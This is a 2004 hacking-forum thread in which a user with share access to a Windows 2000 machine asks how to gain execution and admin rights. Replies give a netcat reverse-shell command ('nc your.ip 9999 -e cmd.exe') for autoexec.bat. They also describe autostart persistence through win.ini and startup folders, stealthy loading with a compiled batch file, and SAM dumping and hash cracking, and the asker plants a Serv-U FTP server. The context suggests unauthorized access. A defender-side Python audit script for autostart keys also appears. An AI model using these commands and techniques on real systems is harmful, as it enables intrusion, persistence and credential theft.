SeNSeMaNN
Jun 23 2004, 10:00 PM
hi
i have access to c$ / d$ and admin$ on my box, can upload, see and download every file, but have no rights to execute, is there any possibility to get these rights with downloading something of this system perhaps to get admin axx ?!
help would be very n1 !!
mfg
buzzons
Jun 23 2004, 10:37 PM
psexec?
SeNSeMaNN
Jun 23 2004, 10:38 PM
i said that i can't execute ;o( what do you mean ?!
slynx
Jun 24 2004, 12:27 AM
ooo....such angry people on this forum :>
if you can wait until the box reboots, you could place a file inside the startup folder, which is a technique used by worms like BugBear.....
other than that and the obvious exploitation of open netbios vulnerabilities....no, i don't think so ;p
gilbert0
Jun 24 2004, 09:56 AM
First of all, there are no stupid questions, just stupid people. There is an answer to your question:
You just put your commands in autoexec.bat and wait till the pc reboots. A well performed google search should provide you with more information. That way you could set up a netcat listening on your pc nc -l -p9999 -vv
and include this command in autoexec.bat nc your.ip 9999 -e cmd.exe
This should give you a cmd shell when the pc reboots. (You would have to upload nc.exe first).
I hope this helps,
Gilbert
Partizaan
Jun 24 2004, 10:20 AM
Connect to the box with DameWare Utilities. A psexec-like shell is included.
I guess u have pass and login ? If u have that it is a plain simple netbios hack.
SeNSeMaNN
Jun 24 2004, 10:51 AM
hehe not so easy guys....
1.) i am not stupid
2.) port 139 is closed and netbios is off.....
3.) cause of 2.) dameware nt does not work
4.) i have a non administration axx
5.) i have c$ and d$ and admin$ access to the machine but not to every folder....
6.) have full upload and download winnt directory root..
7.) if i would place a netcat.bat in the startup folder which startup folder do i have to use ?? default user ??
8.) psexec = not enough permissions ! access denied !
you see that it is not that kind of easy.....
mfg sense
SnakO
Jun 24 2004, 10:51 AM
yeah,
use dameware or psexec..
that nc works too or just create a .bat on C: and let that execute on startup
then if you search this forum you can enter commands in that bat to make another admin user.. etc. like that you can login with your own password.. and give yourself exec rights
nolimit
Jun 24 2004, 11:33 AM
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords.
allik
Jun 24 2004, 11:58 AM
| QUOTE (nolimit @ Jun 24 2004, 11:33 AM) | | If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords. |
would be quite difficult to do this without exec rights but you can try this
| CODE | | net user Administrator * |
then u can set a new pw for the Administrator but i think the admin would notice this very fast but you said it's your box so that wouldn't be a problem
SeNSeMaNN
Jun 24 2004, 12:46 PM
| QUOTE (allik @ Jun 24 2004, 11:58 AM) | | QUOTE (nolimit @ Jun 24 2004, 11:33 AM) | | If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords. |
would be quite difficult to do this without exec rights but you can try this
| CODE | | net user Administrator * |
then u can set a new pw for the Administrator but i think the admin would notice this very fast but you said it's your box so that wouldn't be a problem |
yes but how to do this without shell ?!
| QUOTE | If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords
|
no chance because of missing exec rights...... !! i have no ftp access only through \\server\c$
mfg
allik
Jun 24 2004, 12:54 PM
damn you're right, my fault, so you have to do the method with reboot
SeNSeMaNN
Jun 24 2004, 12:56 PM
| QUOTE (allik @ Jun 24 2004, 12:54 PM) | damn you're right, my fault, so you have to do the method with reboot |
yes but there is still the question which startup folder i have to use !!
this folder ?
\\server\c$\Documents and Settings\Default User\Menu Démarrer\Programmes\Démarrage
or this one ?
\\server\c$\Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage
dont-staY
Jun 24 2004, 01:32 PM
The following are files that programs can autostart from on bootup:
1. c:\autoexec.bat
2. c:\config.sys
3. windir\wininit.ini
4. windir\winstart.bat
5. windir\win.ini - [windows] "load"
6. windir\win.ini - [windows] "run"
7. windir\system.ini - [boot] "shell"
8. windir\system.ini - [boot] "scrnsave.exe"
9. windir\dosstart.bat
10. windir\system\autoexec.nt
11. windir\system\config.nt
All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at:
Windows XP: C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Windows NT: C:\winnt\Profiles\All Users\Start Menu\Programs\Startup
Windows 2000: C:\Documents and Settings\All Users\Start Menu\Programs\Startup
SeNSeMaNN
Jun 24 2004, 03:18 PM
| QUOTE (dont-staY @ Jun 24 2004, 01:32 PM) | The following are files that programs can autostart from on bootup:
1. c:\autoexec.bat
2. c:\config.sys
3. windir\wininit.ini
4. windir\winstart.bat
5. windir\win.ini - [windows] "load"
6. windir\win.ini - [windows] "run"
7. windir\system.ini - [boot] "shell"
8. windir\system.ini - [boot] "scrnsave.exe"
9. windir\dosstart.bat
10. windir\system\autoexec.nt
11. windir\system\config.nt
All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at:
Windows XP: C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Windows NT: C:\winnt\Profiles\All Users\Start Menu\Programs\Startup
Windows 2000: C:\Documents and Settings\All Users\Start Menu\Programs\Startup |
so i can put my netcat.exe and netcat.bat into the all user startup folder ????? or should i only add a shortcut to the startup folder and the files perhaps into the system32 folder ?!
p.s.: can't find the winstart.bat and dosstart.bat on the system !!!!!
SeNSeMaNN
Jun 24 2004, 03:57 PM
hm, no upload access to Documents and Settings ;o( any other idea what to do ?!
T3cHn0b0y
Jun 24 2004, 05:17 PM
Get that (filtered) sam file! Rip the bitch from C:\WINNT\Repair shove it on your own box, pwdump the password hashes and crack the fuckers with LC mother (filtered) 4! Peace
T3cHn0b0y
Jun 24 2004, 05:18 PM
Sorry man I'm feelin weird
SeNSeMaNN
Jun 24 2004, 05:34 PM
fucki* access denied on the sam file o_O
allik
Jun 26 2004, 10:24 AM
just do it like that echo start c:\mynetcatpath\nc.exe>>c:\windir\win.ini
then wait/hope for reboot and your netcat is started
SeNSeMaNN
Jun 26 2004, 03:03 PM
you mean to netcat.bat !!??? echo without cmd ?! interesting.........
i can open and save the win.ini file... so what do i exactly have to add there ??!
Icingtaupe
Jun 27 2004, 04:34 PM
[Edit] Erf, you can edit the Win.ini ... type [windows], or under the [windows] section, type "Run=yourexe.exe", in this case the command for netcat, read before. In the next startup, netcat will be run and give you a shell [/edit] Well... Can you modify the Win.ini ? Or The system.ini ? If you can, just upload your netcat, create a bat which you compile into a .exe ( no shell used in this manner ) ( Use StealthBatch to compile it into an exe ), type the command [boot] or [windows] followed by your file ( nclaunch.exe, why not ) and it will make a stealth load of your exe ... Another try, can you modify YOUR system.ini, upload and then replace the remote file ? It's an idea....
SeNSeMaNN
Jun 27 2004, 04:58 PM
kk, now win.ini looks like this........
; for 16-bit app support
[fonts]
[windows]
Run=c:\servu\servu.exe <-------- servu 2.5 exe file
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
.....
......
correct or wrong ?!
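An added example, not written by any poster in this thread: a defender-side audit of the win.ini / system.ini autostart keys from dont-staY's list and the `Run=` discussion above, flagging any value that is not in an expected baseline. The sample file contents, the baseline allowlist and the function names are constructed for illustration; the startup folders and the other files in the list are not covered.

```python
import re

# Autostart keys named in the thread's list: (file, section, key), lowercased.
AUTOSTART_KEYS = {
    ("win.ini", "windows", "load"),
    ("win.ini", "windows", "run"),
    ("system.ini", "boot", "shell"),
    ("system.ini", "boot", "scrnsave.exe"),
}
# Assumption: a site-specific allowlist of expected values (lowercased).
BASELINE = {("system.ini", "boot", "shell"): {"explorer.exe"}}

# Constructed sample contents, not taken from a real machine.
SAMPLE = {
    "win.ini": r"""
; for 16-bit app support
[fonts]
[windows]
Run=c:\example\unknown.exe
load=
[Mail]
MAPI=1
""",
    "system.ini": "[boot]\nshell=Explorer.exe\n[drivers]\nwave=mmdrv.dll\n",
}

def autostart_entries(filename, text):
    """Yield (file, section, key, value) for each non-empty autostart key."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank line or comment
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        key, sep, value = line.partition("=")
        ident = (filename.lower(), section, key.strip().lower())
        if sep and ident in AUTOSTART_KEYS and value.strip():
            yield (*ident, value.strip())

def audit(files):
    """Return autostart entries whose value is not in the baseline."""
    return [
        entry
        for name, text in files.items()
        for entry in autostart_entries(name, text)
        if entry[3].lower() not in BASELINE.get(entry[:3], set())
    ]

if __name__ == "__main__":
    for f, s, k, v in audit(SAMPLE):
        print(f"unexpected autostart: {f} [{s}] {k}={v}")
```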
strasharo
Jun 27 2004, 05:48 PM
So much effort from so many people that wanted to help for one f****d servu? Weird...
SeNSeMaNN
Jun 27 2004, 07:03 PM
| QUOTE (strasharo @ Jun 27 2004, 05:48 PM) | So much effort from so many people that wanted to help for one f****d servu?Weird... |
its just a simple ftp, and one of the smallest... why not to get ftp root ?!
yes, and i am very happy about it.... but such a post like yours is really (filtered)** up.. and doesn't help.... so go home to your mummi and flame there..
strasharo
Jun 27 2004, 08:49 PM
Blah, better close your mouth. I'm bored of serv-u kids jumping around and making havoc... So better go to dig some potatoes...
Icingtaupe
Jun 28 2004, 11:22 PM
| QUOTE (strasharo @ Jun 27 2004, 05:48 PM) | So much effort from so many people that wanted to help for one f****d servu?Weird... |
I don't know how you work, Strasharo, but I'm here to help people and make their projects work, not to say "Sh***, this iz an useless topic, whY do u help him ?"... I think your post is useless, in fact... or, maybe you want to make people angry, then, continue like this, but I really think this is useless... Well, his project works ? He has a root access on the box ? Well, if it does, i think the topic can be terminated... but posting to say "if i was in your shoes, i might not help him"... it's stupid ... let him do what he wants, and let us do what we want, if we have time to lose for other people and help them, I think it's better than having time to lose to not help people and say what you say ... That's all, I can go out, now... Edit : Hu, and I'm bored about people that tell them better than other and don't help others... Forget my English, it's not my native language...
cougar
Jun 28 2004, 11:56 PM
why do people get upset about such things? This is a security board, and most of the times people also use this information to setup/secure a box --> beside securing their own servers. So why not help each other, if you don't like the thread, --> don't reply?
SeNSeMaNN
Jul 4 2004, 08:29 AM
| QUOTE (cougar @ Jun 28 2004, 11:56 PM) | why do people get upset about such things? This is a security board, and most of the times people also use this information to setup/secure a box --> beside securing their own servers.
So why not help each other, if you don't like the thread, --> don't reply? |
that's my opinion too. just wanna have ftp root access so i want to do it this way... but what about my win.ini modification, is it now correct or wrong ?!
| QUOTE |
; for 16-bit app support
[fonts]
[windows]
Run=c:\servu\servu.exe <-------- servu 2.5 exe file
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
.....
......
|
greetz
brOmstar
Jul 4 2004, 09:39 AM
try it at home
SeNSeMaNN
Jul 4 2004, 10:51 AM
| QUOTE (brOmstar @ Jul 4 2004, 09:39 AM) | try it at home |
just want to be sure that my system starts correctly, because i don't wanna use the whole day to set up a new win2000 server. hmmmmmmm something to win.ini and system.ini my system has got win2000. and the win.ini and the system.ini are for 16 bit support! does win2000 use these things ?! what can i put into autoexec.bat ?! o_O mfg